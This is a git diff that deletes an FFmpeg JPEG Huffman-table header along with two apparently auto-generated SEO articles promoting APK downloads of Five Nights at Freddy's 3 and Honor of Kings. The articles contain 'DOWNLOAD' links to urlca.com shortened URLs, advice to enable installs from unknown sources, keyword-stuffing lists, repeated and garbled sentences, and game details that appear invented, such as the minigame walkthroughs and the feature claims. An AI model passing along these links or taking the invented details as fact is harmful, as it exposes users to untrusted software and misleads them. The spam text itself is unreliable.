implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#ifndef AVCODEC_JPEGTABS_H -#define AVCODEC_JPEGTABS_H - -#include -#include "jpegtables.h" - -/* Set up the standard Huffman tables (cf. JPEG standard section K.3) */ -/* IMPORTANT: these are only valid for 8-bit data precision! */ -const uint8_t ff_mjpeg_bits_dc_luminance[17] = -{ /* 0-base */ 0, 0, 1, 5, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0 }; -const uint8_t ff_mjpeg_val_dc[12] = -{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 }; - -const uint8_t ff_mjpeg_bits_dc_chrominance[17] = -{ /* 0-base */ 0, 0, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0 }; - -const uint8_t ff_mjpeg_bits_ac_luminance[17] = -{ /* 0-base */ 0, 0, 2, 1, 3, 3, 2, 4, 3, 5, 5, 4, 4, 0, 0, 1, 0x7d }; -const uint8_t ff_mjpeg_val_ac_luminance[] = -{ 0x01, 0x02, 0x03, 0x00, 0x04, 0x11, 0x05, 0x12, - 0x21, 0x31, 0x41, 0x06, 0x13, 0x51, 0x61, 0x07, - 0x22, 0x71, 0x14, 0x32, 0x81, 0x91, 0xa1, 0x08, - 0x23, 0x42, 0xb1, 0xc1, 0x15, 0x52, 0xd1, 0xf0, - 0x24, 0x33, 0x62, 0x72, 0x82, 0x09, 0x0a, 0x16, - 0x17, 0x18, 0x19, 0x1a, 0x25, 0x26, 0x27, 0x28, - 0x29, 0x2a, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, - 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, - 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, - 0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, - 0x6a, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, - 0x7a, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, - 0x8a, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, - 0x99, 0x9a, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, - 0xa8, 0xa9, 0xaa, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, - 0xb7, 0xb8, 0xb9, 0xba, 0xc2, 0xc3, 0xc4, 0xc5, - 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xd2, 0xd3, 0xd4, - 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, 0xe1, 0xe2, - 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea, - 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, - 0xf9, 0xfa -}; - -const uint8_t ff_mjpeg_bits_ac_chrominance[17] = -{ /* 0-base */ 0, 0, 2, 1, 2, 4, 4, 3, 4, 7, 5, 4, 4, 0, 1, 2, 0x77 }; - -const uint8_t ff_mjpeg_val_ac_chrominance[] = -{ 0x00, 0x01, 0x02, 0x03, 0x11, 0x04, 0x05, 0x21, - 0x31, 0x06, 0x12, 0x41, 0x51, 0x07, 0x61, 0x71, - 0x13, 0x22, 0x32, 0x81, 0x08, 0x14, 0x42, 0x91, - 0xa1, 0xb1, 0xc1, 0x09, 0x23, 0x33, 0x52, 0xf0, - 0x15, 0x62, 0x72, 0xd1, 0x0a, 0x16, 0x24, 0x34, - 0xe1, 0x25, 0xf1, 0x17, 0x18, 0x19, 0x1a, 0x26, - 0x27, 0x28, 0x29, 0x2a, 0x35, 0x36, 0x37, 0x38, - 0x39, 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, - 0x49, 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, - 0x59, 0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, - 0x69, 0x6a, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, - 0x79, 0x7a, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, - 0x88, 0x89, 0x8a, 0x92, 0x93, 0x94, 0x95, 0x96, - 0x97, 0x98, 0x99, 0x9a, 0xa2, 0xa3, 0xa4, 0xa5, - 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xb2, 0xb3, 0xb4, - 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xc2, 0xc3, - 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xd2, - 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, - 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, - 0xea, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, - 0xf9, 0xfa -}; -#endif diff --git a/spaces/congsaPfin/Manga-OCR/logs/Five Nights At Freddy 39s 3 Apk Full Version NEW!.md b/spaces/congsaPfin/Manga-OCR/logs/Five Nights At Freddy 39s 3 Apk Full Version NEW!.md deleted file mode 100644 index 968b1ec31beb0f50bdffade2ed3bea7b39483fcd..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Five Nights At Freddy 39s 3 Apk Full Version NEW!.md +++ /dev/null @@ -1,144 +0,0 @@ -
    -

    Five Nights at Freddy's 3 APK Full Version: A Guide for Horror Fans

    -

    If you are a fan of horror games, you have probably heard of Five Nights at Freddy's, a series of point-and-click survival horror games that have become a cult phenomenon. The games revolve around a fictional chain of pizza restaurants called Freddy Fazbear's Pizza, where animatronic characters entertain children during the day, but become murderous at night. You play as a security guard who must survive five nights (or more) in these haunted locations, using cameras, doors, lights, and other tools to fend off the attacks of the animatronics.

    -

    five nights at freddy 39;s 3 apk full version


    DOWNLOAD ✸✸✸ https://urlca.com/2uO7Mg



    -

    One of the most popular entries in the series is Five Nights at Freddy's 3, which was released in 2015 for Windows, Android, iOS, Nintendo Switch, PlayStation 4, and Xbox One. The game takes place thirty years after the events of the first game, in a horror-themed attraction based on the legend of Freddy Fazbear's Pizza. You face a new threat in the form of Springtrap, a decayed animatronic rabbit that roams around the attraction. You also have to deal with phantoms, hallucinations of the previous animatronics that can cause errors in your systems.

    -

    If you want to experience this terrifying game on your Android device, you can download Five Nights at Freddy's 3 APK full version from various sources online. This is a file format that allows you to install applications that are not available on Google Play Store. However, before you do that, you might want to read this guide to learn more about the game, its features, its tips and tricks, its reviews, and its features, its tips and tricks, its reviews, and some FAQs. Let's get started!

    -

    The Plot of Five Nights at Freddy's 3

    -

    The game is set in the year 2023, thirty years after the closure of Freddy Fazbear's Pizza, the original location of the first game. A group of entrepreneurs have decided to create a horror-themed attraction called Fazbear's Fright: The Horror Attraction, based on the urban legends and rumors surrounding the pizzeria. They have collected various relics and artifacts from the old restaurants, such as masks, posters, animatronic parts, and even a security camera system.

    -

    You play as an unnamed security guard who works the night shift at the attraction, from 12 AM to 6 AM. Your job is to monitor the cameras and make sure that everything is in order. However, you soon discover that there is one animatronic that is still functional: Springtrap, a yellow rabbit suit that was used as both a costume and an animatronic by the previous owner of the pizzeria. Springtrap is possessed by the spirit of William Afton, a serial killer who murdered several children at Freddy Fazbear's Pizza and hid their bodies inside the animatronics. He is also the one who caused the infamous Bite of '87, an incident where he bit off the frontal lobe of a child while wearing the Springtrap suit.

    -

    -

    Springtrap is not only dangerous, but also intelligent and cunning. He can move around the attraction freely, and will try to find your office and kill you. You have to use the camera system to track his movements and lure him away from your location by playing audio clips of a child's voice. You also have to deal with the phantoms, hallucinations of the previous animatronics that can appear on your screen or in your office. They cannot harm you directly, but they can cause errors in your systems, such as disabling your ventilation, audio, or video. If this happens, you have to use the maintenance panel to reboot them as quickly as possible, or you will suffer from oxygen deprivation, audio distortion, or visual impairment.

    -

    The game has five nights (or levels) that increase in difficulty as you progress. There are also two endings: a bad ending and a good ending. The bad ending is achieved by simply completing all five nights. The good ending requires you to find and complete hidden minigames that reveal the backstory of the game and allow you to free the souls of the children that were killed by William Afton.

    -

    The Gameplay of Five Nights at Freddy's 3

    -

    The Camera System

    -

    The camera system is your main tool for surviving in Five Nights at Freddy's 3. It consists of 15 cameras that cover different areas of the attraction, such as hallways, rooms, vents, and exits. You can switch between them by clicking on their icons on a map on your screen. You can also zoom in on certain cameras by double-clicking on them.

    -

    The camera system allows you to see where Springtrap is and what he is doing. You can also use it to lure him away from your office by playing audio clips of a child's voice on certain cameras. This will make Springtrap think that there is someone there and move towards that location. However, you have to be careful not to play the audio too often or on the same camera repeatedly, or it will malfunction and stop working for a while.

    -

    The camera system also shows you if there are any phantoms nearby. If you see one of them on your screen, you have to switch to another camera quickly or they will jump scare you and cause errors in your systems.

    -

    The Maintenance Panel

    -

    The maintenance panel is your backup tool for fixing any errors that occur in your systems. It consists of three buttons that correspond to three systems: ventilation, audio, and video. If any of these systems malfunction, you have to click on their buttons and wait for them to reboot.

    -

    The ventilation system controls the air flow in your office. If it fails, you will start to lose oxygen and hallucinate more frequently. You will also hear loud noises and see flashing lights that can distract you from Springtrap's movements.

    -

    The audio system controls the sound in your office and on the cameras. If it fails, you will not be able to hear Springtrap's footsteps or breathing, or play audio clips to lure him away. You will also hear distorted noises that can confuse you or scare you.

    -

    The video system controls the image quality on your screen and on the cameras. If it fails, you will not be able to see Springtrap's location or any phantoms clearly clearly. You will also see static and glitches that can obscure your vision.

    -

    The maintenance panel is located on the lower right corner of your screen. You can access it by clicking on the button with a wrench icon. However, you have to be careful not to use it too often or for too long, or you will leave yourself vulnerable to Springtrap's attack. You also have to make sure that you reboot the systems in the right order, or you will waste time and risk losing more systems.

    -

    The Phantoms

    -

    The phantoms are the hallucinations of the previous animatronics that can appear in Five Nights at Freddy's 3. They are the ghosts of the children that were killed by William Afton and trapped inside the animatronics. They are not real, but they can still affect your gameplay and scare you.

    -

    There are six phantoms in total: Phantom Freddy, Phantom Chica, Phantom Foxy, Phantom Mangle, Phantom Balloon Boy, and Phantom Puppet. They can appear on your screen or in your office randomly, or when you trigger certain events. For example, Phantom Freddy will appear when you look at the left side of your office for too long, Phantom Chica will appear when you look at a certain arcade machine on camera 07, and Phantom Foxy will appear when you look at a certain window on camera 04.

    -

    When a phantom appears, you have to react quickly and avoid looking at them or they will jump scare you and cause errors in your systems. You can prevent them from appearing by switching cameras or looking away from them. However, some of them are harder to avoid than others. For example, Phantom Balloon Boy will disable your ventilation system if he appears in your office, regardless of whether you look at him or not. Phantom Puppet will also block your view for a few seconds if he appears on your screen, making it harder to see Springtrap.

    -

    The phantoms are not your main enemies, but they can still make your life difficult and stressful. You have to learn how to deal with them and not let them distract you from Springtrap.

    -

    The Features of Five Nights at Freddy's 3 APK Full Version

    -

    The Graphics and Sound

    -

    One of the features that make Five Nights at Freddy's 3 APK full version a great horror game is its graphics and sound. The game creates a creepy atmosphere with its visuals and audio that will keep you on edge throughout the night.

    -

    The graphics of the game are dark and gritty, with a lot of details and textures that make the attraction look realistic and haunted. The game also uses lighting and shadows to create contrast and suspense, making some areas brighter or darker than others. The game also has a lot of animations and effects that make the game more dynamic and immersive, such as Springtrap's movements, the phantoms' appearances, the errors' glitches, and the jump scares' flashes.

    -

    The sound of the game is also very important for creating tension and fear. The game uses a lot of sounds and noises that make the game more realistic and scary, such as Springtrap's footsteps, breathing, and moaning, the phantoms' screams, the errors' beeps, and the jump scares' screeches. The game also has a lot of music and soundtracks that set the mood and tone of the game, such as the eerie background music, the ominous phone calls, the haunting minigames' tunes, and the dramatic endings' songs.

    -

    The graphics and sound of Five Nights at Freddy's 3 APK full version are designed to make you feel like you are really in a horror attraction, facing a deadly animatronic and terrifying hallucinations. You will not be able to relax or get bored while playing this game.

    -

    The Extras and Minigames

    -

    Another feature that makes Five Nights at Freddy's 3 APK full version a great horror game is its extras and minigames. The game offers additional content and secrets that add more depth and replay value to the game.

    -

    The extras menu is unlocked after completing night five. It allows you to access various options and modes that enhance your gameplay experience. For example, you can view the 3D models of Springtrap and the phantoms, change their difficulty levels from 0 to 20 in custom night mode, play nightmare mode which is an extra hard night six, watch four different endings depending on your actions in the game, and listen to six different phone calls that reveal more information about the plot of the game.

    -

    The minigames are hidden games that can be accessed by performing certain actions in the main game. They are pixelated games that resemble old arcade games. They tell the backstory of the game and allow you to free the souls of the children that were killed by William Afton and trapped inside the animatronics. There are six minigames in total: BB's Air Adventure, Mangle's Quest, Chica's Party, Stage01, Glitch Minigame, and Happiest Day. Each minigame has a different objective and a different way to access it. For example, to play BB's Air Adventure, you have to click on a drawing of Balloon Boy on the wall of camera 08, and to play Happiest Day, you have to complete all the other minigames first.

    -

    The extras and minigames of Five Nights at Freddy's 3 APK full version are designed to make you explore more of the game and its lore, and reward you with more challenges and surprises. You will not be able to get enough of this game.

    -

    The Compatibility and Accessibility

    -

    A final feature that makes Five Nights at Freddy's 3 APK full version a great horror game is its compatibility and accessibility. The game runs smoothly on Android devices and has options for customization and optimization.

    -

    The game is compatible with most Android devices that have Android 4.0 or higher. It has a file size of about 50 MB, which is not too large for most devices. It also does not require an internet connection to play, so you can enjoy it offline.

    -

    The game also has options for accessibility and personalization. You can adjust the brightness, volume, and sensitivity of the game according to your preferences. You can also enable or disable the vibration feature, which makes your device vibrate when you get jump scared. You can also choose the language of the game from English, Spanish, French, Italian, German, Portuguese, Russian, Chinese, Japanese, or Korean.

    -

    The compatibility and accessibility of Five Nights at Freddy's 3 APK full version are designed to make you play the game comfortably and conveniently on your Android device. You will not have any problems or issues while playing this game.

    -

    The Tips and Tricks for Five Nights at Freddy's 3 APK Full Version

    -

    How to Survive Each Night

    -

    If you want to survive each night in Five Nights at Freddy's 3 APK full version, you need to use the tools and strategies that are available to you. Here are some tips and tricks that can help you keep Springtrap away from your office:

    -
      -
    • Use the camera system wisely. Check the cameras frequently to see where Springtrap is and what he is doing. Use the audio clips to lure him away from your office or towards a dead end. Do not play the audio too often or on the same camera repeatedly, or it will malfunction.
    • -
    • Use the maintenance panel quickly. If any of your systems fail, use the maintenance panel to reboot them as soon as possible. Do not use it too often or for too long, or you will leave yourself vulnerable to Springtrap's attack. Reboot the systems in the right order, starting with ventilation, then audio, then video.
    • -
    • Use the vents effectively. Check the vents regularly to see if Springtrap is in them or near them. If he is in a vent, seal it by clicking on the button next to it. If he is near a vent, play an audio clip on a camera near that vent to lure him away from it.
    • -
    • Use the phantoms carefully. Avoid looking at the phantoms or they will jump scare you and cause errors in your systems. Switch cameras or look away from them if you see them on your screen or in your office. However, some phantoms can be useful in certain situations. For example, Phantom Freddy can distract Springtrap for a few seconds if he appears in front of him.
    • -
    -

    By following these tips and tricks, you can increase your chances of surviving each night in Five Nights at Freddy's 3 APK full version.

    -

    How to Get the Good Ending

    -

    If you want to get the good ending in Five Nights at Freddy's 3 APK full version, you need to find and complete hidden minigames that reveal the backstory of the game and allow you to free the souls of the children that were killed by William Afton and trapped inside the animatronics. Here are some tips and tricks that can help you get the good ending:

    -
      -
    • Play BB's Air Adventure on night one. To access this minigame, click on a drawing of Balloon Boy on the wall of camera 08. In this minigame, you control Balloon Boy as he collects balloons and avoids obstacles. To complete this minigame, collect all eight balloons and then jump out of bounds on the top right corner of the map. You will see a crying child holding a balloon.
    • -
    • Play Mangle's Quest on night two. To To access this minigame, click on a button on the left side of the arcade machine on camera 07. In this minigame, you control Mangle as he collects his parts and avoids obstacles. To complete this minigame, collect all eight parts and then jump out of bounds on the top left corner of the map. You will see a crying child holding a cake.
    • -
    • Play Chica's Party on night three. To access this minigame, click on a cupcake on the wall of camera 02, 03, 04, or 06. In this minigame, you control Chica as she delivers cupcakes to children and avoids obstacles. To complete this minigame, deliver all four cupcakes and then jump out of bounds on the bottom right corner of the map. You will see a crying child holding a present.
    • -
    • Play Stage01 on night four. To access this minigame, click on a poster of Golden Freddy and Spring Bonnie on the wall of camera 01. In this minigame, you control Spring Bonnie as he follows Golden Freddy to the stage and back. To complete this minigame, follow Golden Freddy three times and then jump out of bounds on the bottom left corner of the map. You will see a crying child holding a mask.
    • -
    • Play Glitch Minigame on night five. To access this minigame, click on Shadow Bonnie's figurine on your desk. In this minigame, you control Shadow Bonnie as he glitches through different minigames and locations. To complete this minigame, glitch through the following sequence: BB's Air Adventure, Mangle's Quest, Chica's Party, Stage01, and then a dark room with a crying child holding a balloon. Click on the balloon to give it to the child.
    • -
    • Play Happiest Day on any night after completing all the other minigames. To access this minigame, double-click on the Marionette's poster on the wall of camera 03. In this minigame, you control the Marionette as he collects masks for the children and leads them to a birthday party. To complete this minigame, collect all six masks and then enter the party room. You will see six children wearing masks of Freddy, Chica, Foxy, Mangle, Balloon Boy, and Puppet. They will be joined by a seventh child wearing a mask of Golden Freddy. The children will then take off their masks and fade away, implying that they have been freed from their animatronic prisons.
    • -
    -

    By following these tips and tricks, you can get the good ending in Five Nights at Freddy's 3 APK full version.

    -

    How to Avoid Common Mistakes

    -

    If you want to avoid common mistakes in Five Nights at Freddy's 3 APK full version, you need to be aware of some errors, glitches, and crashes that can ruin your gameplay experience. Here are some tips and tricks that can help you avoid them:

    -
      -
    • Do not download the game from untrusted sources. Some sources may contain viruses or malware that can harm your device or steal your data. Only download the game from reputable sources that have positive reviews and ratings.
    • -
    • Do not modify or hack the game files. Some modifications or hacks may cause the game to malfunction or crash. They may also make the game easier or harder than intended, which can affect your enjoyment and satisfaction.
    • -
    • Do not play the game on low battery or low memory. Some devices may not be able to run the game smoothly or properly if they have low battery or low memory. They may also shut down unexpectedly or lose your progress. Make sure that your device is fully charged and has enough space before playing the game.
    • -
    • Do not ignore the instructions or hints. Some players may skip or ignore the instructions or hints that are given by the phone guy or other sources in the game. They may miss important information or tips that can help them survive or get the good ending.
    • -
    -

    By following these tips and tricks, you can avoid common mistakes in Five Nights at Freddy's 3 APK full version.

    -

    The Reviews of Five Nights at Freddy's 3 APK Full Version

    -

    The Positive Reviews

    -

    Many critics and players have given positive reviews to Five Nights at Freddy's 3 APK full version. Here are some of their praises and compliments:

    -
      -
    • The game is scary and thrilling, with a lot of jump scares and suspenseful moments.
    • -
    • The game is challenging and rewarding, with a lot of difficulty levels and endings to achieve.
    • -
    • The game is creative and original, with a lot of new features and secrets to discover.
    • -
    • The game is immersive and atmospheric, with a lot of graphics and sound effects that create a creepy and haunted environment.
    • -
    • The game is fun and addictive, with a lot of replay value and extras to enjoy.
    • -
    -

    Some examples of positive reviews are:

    -
    -

    "Five Nights at Freddy's 3 is a terrifying and exhilarating game that will keep you on the edge of your seat. The game has a lot of new features and secrets that make it more interesting and challenging than the previous games. The game also has a lot of graphics and sound effects that create a creepy and immersive atmosphere. The game is definitely worth playing if you are a fan of horror games."

    -
    -
    -

    "Five Nights at Freddy's 3 is a masterpiece of horror gaming. The game has a lot of difficulty levels and endings that make it more rewarding and satisfying to play. The game also has a lot of hidden minigames that reveal the backstory of the game and allow you to free the souls of the children. The game is not only scary, but also emotional and touching. The game is a must-play for anyone who loves horror games."

    -
    -

    The Negative Reviews

    -

    However, not everyone has given positive reviews to Five Nights at Freddy's 3 APK full version. Here are some of their criticisms and complaints:

    -
      -
    • The game is too hard and frustrating, with a lot of trial and error and unfair mechanics.
    • -
    • The game is too repetitive and boring, with a lot of the same gameplay and jump scares.
    • -
    • The game is too short and simple, with a lot of wasted potential and missed opportunities.
    • -
    • The game is too buggy and glitchy, with a lot of errors and crashes that ruin the gameplay experience.
    • -
    • The game is too expensive and overpriced, with a lot of in-app purchases and ads that annoy the players.
    • -
    -

    Some examples of negative reviews are:

    -
    -

    "Five Nights at Freddy's 3 is a disappointing and frustrating game that will make you rage quit. The game is too hard and unfair, with a lot of trial and error and random factors that make it impossible to win. The game also has a lot of errors and glitches that make it unplayable. The game is not worth playing if you value your sanity."

    -
    -
    -

    "Five Nights at Freddy's 3 is a boring and unoriginal game that will make you yawn. The game is too repetitive and predictable, with a lot of the same gameplay and jump scares that lose their effect. The game also has a lot of wasted potential and missed opportunities, with a lot of features and secrets that are either too hard to find or too easy to miss. The game is not worth playing if you want something new and exciting."

    -
    -

    The Mixed Reviews

    -

    Finally, some critics and players have given mixed reviews to Five Nights at Freddy's 3 APK full version. Here are some of their pros and cons:

    -
      -
    • The game is scary but not too scary, with a lot of jump scares but also a lot of suspense and atmosphere.
    • -
    • The game is challenging but not too challenging, with a lot of difficulty levels but also a lot of strategies and hints.
    • -
    • The game is creative but not too creative, with a lot of new features but also a lot of familiar elements.
    • -
    • The game is immersive but not too immersive, with a lot of graphics and sound effects but also a lot of errors and glitches.
    • -
    • The game is fun but not too fun, with a lot of replay value but also a lot of in-app purchases and ads.
    • -
    -

    Some examples of mixed reviews are:

    -
    -

    "Five Nights at Freddy's 3 is a decent horror game that will keep you entertained for a while. The game has some good features and secrets that make it more interesting and challenging than the previous games. The game also has some scary and thrilling moments that will make you jump and scream. However, the game also has some flaws and drawbacks that make it less enjoyable and satisfying than it could be. The game is too buggy and glitchy, with a lot of errors and crashes that ruin the gameplay experience. The game is also too expensive and overpriced, with a lot of in-app purchases and ads that annoy the players. The game is worth playing if you are a fan of the series, but not if you are looking for something flawless and cheap."

    -
    -
    -

    "Five Nights at Freddy's 3 is a good horror game that will keep you hooked for a long time. The game has some great features and secrets that add more depth and replay value to the game. The game also has some emotional and touching moments that will make you cry and smile. However, the game also has some problems and issues that make it less fun and engaging than it should be. The game is too hard and frustrating, with a lot of trial and error and unfair mechanics. The game is also too repetitive and boring, with a lot of the same gameplay and jump scares. The game is worth playing if you are looking for something challenging and rewarding, but not if you are looking for something easy and exciting."

    -
    -

    The Conclusion of Five Nights at Freddy's 3 APK Full Version

    -

    In conclusion, Five Nights at Freddy's 3 APK full version is a horror game that has a lot of pros and cons. The game has a lot of features and secrets that make it more interesting and challenging than the previous games. The game also has a lot of graphics and sound effects that create a creepy and immersive atmosphere. However, the game also has a lot of errors and glitches that make it unplayable or annoying. The game also has a lot of difficulty levels and endings that make it more rewarding or frustrating.

    -

    If you are a fan of horror games, you might want to give Five Nights at Freddy's 3 APK full version a try. You might enjoy its gameplay, its story, its extras, and its minigames. You might also get scared, thrilled, or touched by its jump scares, its suspense, or its endings. However, if you are not a fan of horror games, you might want to avoid Five Nights at Freddy's 3 APK full version. You might hate its gameplay, its story, its in-app purchases, or its ads. You might also get bored, angry, or disappointed by its repetition, its difficulty, or its bugs.

    -

    The choice is yours. Do you dare to play Five Nights at Freddy's 3 APK full version?

    -

    The FAQs of Five Nights at Freddy's 3 APK Full Version

    -

    Here are some of the common questions and answers that people have about Five Nights at Freddy's 3 APK full version:

    -
      -
    1. Q: How do I download Five Nights at Freddy's 3 APK full version?
    2. -
    3. A: You can download Five Nights at Freddy's 3 APK full version from various sources online, such as APKPure, APKMirror, or APKMonk. However, make sure that you download it from reputable sources that have positive reviews and ratings.
    4. -
    5. Q: How do I install Five Nights at Freddy's 3 APK full version?
    6. -
    7. A: To install Five Nights at Freddy's 3 APK full version on your Android device, you need to enable the option to install apps from unknown sources in your settings. Then, you need to locate the downloaded file in your file manager and tap on it to install it.
    8. -
    9. Q: How do I play Five Nights at Freddy's 3 APK full version?
    10. -
    11. A: To play Five Nights at Freddy's 3 APK full version on your Android device, you need to launch the app from your app drawer or home screen. Then, you need to select the night that you want to play from the main menu. Then, you need to use the camera system, the maintenance panel, the vents, and the phantoms to survive each night.
    12. -
    13. Q: How do I get the good ending in Five Nights at Freddy's 3 APK full version?
    14. -
    15. A: To get the good ending in Five Nights at Freddy's 3 APK full version on your Android device A: To get the good ending in Five Nights at Freddy's 3 APK full version on your Android device, you need to find and complete hidden minigames that reveal the backstory of the game and allow you to free the souls of the children that were killed by William Afton and trapped inside the animatronics. You can follow the tips and tricks that I have provided in the previous section of this article.
    16. -
    17. Q: How do I uninstall Five Nights at Freddy's 3 APK full version?
    18. -
    19. A: To uninstall Five Nights at Freddy's 3 APK full version from your Android device, you need to go to your settings and select the apps or applications option. Then, you need to find and select the app from the list and tap on the uninstall button. You can also delete the downloaded file from your file manager if you want to free up some space.
    20. -
    -

    I hope this article has helped you learn more about Five Nights at Freddy's 3 APK full version and how to play it on your Android device. If you have any questions or feedback, feel free to leave a comment below. Thank you for reading and have a great day!

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Honor of Kings APK The Latest Version of the Game that Offers a Smooth Gameplay with a Dedicated Brazilian Server.md b/spaces/congsaPfin/Manga-OCR/logs/Honor of Kings APK The Latest Version of the Game that Offers a Smooth Gameplay with a Dedicated Brazilian Server.md deleted file mode 100644 index 586130dd96342189f4004fadf891fa1b0d00e70c..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Honor of Kings APK The Latest Version of the Game that Offers a Smooth Gameplay with a Dedicated Brazilian Server.md +++ /dev/null @@ -1,124 +0,0 @@ -
    -

    Honor of Kings APK Download Latest Version: Everything You Need to Know

    -

    If you are looking for a fun, social, competitive, and free mobile game to play, you should definitely check out Honor of Kings. Honor of Kings is a popular mobile MOBA (multiplayer online battle arena) game that offers an immersive and exciting gameplay experience on your Android device. In this article, we will tell you everything you need to know about Honor of Kings, including what it is, why you should play it, how to download it, what's new in it, and some tips and tricks for playing it. Let's get started!

    -

    honor of kings apk download latest version


    Download File ––– https://urlca.com/2uOd4F



    -

    What is Honor of Kings?

    -

    Honor of Kings is a mobile MOBA game developed by TiMi Studio Group and published by Level Infinite. It was released in China in 2015 and has since become one of the most-played mobile games in the world, with over 100 million average daily active users in 2020. The game is now available in Brazil with fully localized text and voice-over.

    -

    In Honor of Kings, you can choose from around 60 unique heroes with amazing skills, stunning skins, and legendary stories. You can play solo or team up with your friends in 5v5 matches, where you have to advance along three lanes, destroy nine towers, and ultimately destroy the enemy's crystal. The game features fast-paced teamfights, strategic gameplay, diverse modes, social events, and more.

    -

    Why You Should Play Honor of Kings?

    -

    There are many reasons why you should play Honor of Kings. Here are some of them:

    -
  • Fun: Honor of Kings is a fun game that will keep you entertained for hours. You can enjoy the thrill of battling against other players, unleashing your hero's skills, and winning matches. You can also customize your hero with different skins, emotes, and effects.
  • -
  • Social: Honor of Kings is a social game that lets you connect with your friends and make new ones. You can chat with your teammates, join a guild, participate in events, and send gifts. You can also invite your friends to play with you or challenge them to a duel.
  • -
  • Competitive: Honor of Kings is a competitive game that tests your skills, strategy, and teamwork. You can climb the ranks, earn rewards, and prove yourself as the best player. You can also watch live streams, replays, and highlights of other players and learn from them.
  • -
  • Free: Honor of Kings is a free game that does not require any payment to play. You can download and install the game on your Android device without any hassle. You can also unlock most of the heroes and skins by playing the game and completing quests.
  • - -

    How to Download Honor of Kings APK Latest Version?

    -

    If you want to play Honor of Kings on your Android device, you need to download and install the APK file of the latest version. APK stands for Android Package Kit, which is a file format that contains all the necessary files and data for an Android app. Here are the steps to download and install Honor of Kings APK latest version:

    -

    Step 1: Go to the official website or Google Play Store

    -

    You can download Honor of Kings APK latest version from either the official website or the Google Play Store. To access the official website, you can use this link: [Honor of Kings Official Website]. To access the Google Play Store, you can use this link: [Honor of Kings on Google Play Store]. Alternatively, you can search for "Honor of Kings" on your browser or Google Play Store app.

    -

    Step 2: Tap on the download button and wait for the APK file to be downloaded

    -

    Once you are on the download page, you will see a download button that says "Download APK" or "Install". Tap on it and wait for the APK file to be downloaded on your device. You can check the download progress on your notification bar or download manager.

    -

    Step 3: Enable unknown sources on your device settings

    -

    Before you can install Honor of Kings APK latest version on your device, you need to enable unknown sources on your device settings. This will allow you to install apps from sources other than Google Play Store. To do this, follow these steps:

    -

    honor of kings android game free download
    -how to install honor of kings apk on android
    -honor of kings latest version apk for android
    -download honor of kings mobile game apk
    -honor of kings apk update 2023 download
    -honor of kings game download apk file
    -honor of kings apk download for pc windows
    -honor of kings android apk mod unlimited money
    -honor of kings apk offline mode download
    -honor of kings apk latest version 8.2.1.18 download
    -honor of kings game apk free download for android
    -honor of kings apk download new version 2023
    -honor of kings apk obb data download
    -honor of kings apk download without google play
    -honor of kings apk download link 2023
    -honor of kings apk full version download
    -honor of kings apk hack version download
    -honor of kings apk download for android tv
    -honor of kings apk download for tablet
    -honor of kings apk old version download
    -honor of kings game online play apk download
    -honor of kings game review and apk download
    -honor of kings game tips and tricks apk download
    -honor of kings game guide and walkthrough apk download
    -honor of kings game cheats and codes apk download
    -honor of kings game wallpapers and themes apk download
    -honor of kings game characters and skins apk download
    -honor of kings game news and updates apk download
    -honor of kings game events and rewards apk download
    -honor of kings game support and feedback apk download
    -how to play honor of kings game on android apk download
    -how to update honor of kings game on android apk download
    -how to uninstall honor of kings game on android apk download
    -how to fix honor of kings game errors on android apk download
    -how to backup and restore honor of kings game on android apk download
    -how to transfer honor of kings game data on android apk download
    -how to connect honor of kings game with facebook on android apk download
    -how to join a clan in honor of kings game on android apk download
    -how to chat with friends in honor of kings game on android apk download
    -how to customize your hero in honor of kings game on android apk download
    -how to level up your hero in honor of kings game on android apk download
    -how to unlock new heroes in honor of kings game on android apk download
    -how to earn coins and gems in honor of kings game on android apk download
    -how to spend coins and gems in honor of kings game on android apk download
    -how to win battles in honor of kings game on android apk download
    -how to improve your skills in honor of kings game on android apk download
    -how to rank up in honor of kings game on android apk download
    -how to watch replays in honor of kings game on android apk download
    -how to stream your gameplay in honor of kings game on android apk download

    -
      -
    • Go to your device settings and tap on "Security" or "Privacy".
    • -
    • Find and tap on "Unknown sources" or "Install unknown apps".
    • -
    • Toggle on the switch or check the box to enable it.
    • -
    • Confirm by tapping on "OK" or "Allow".
    • -
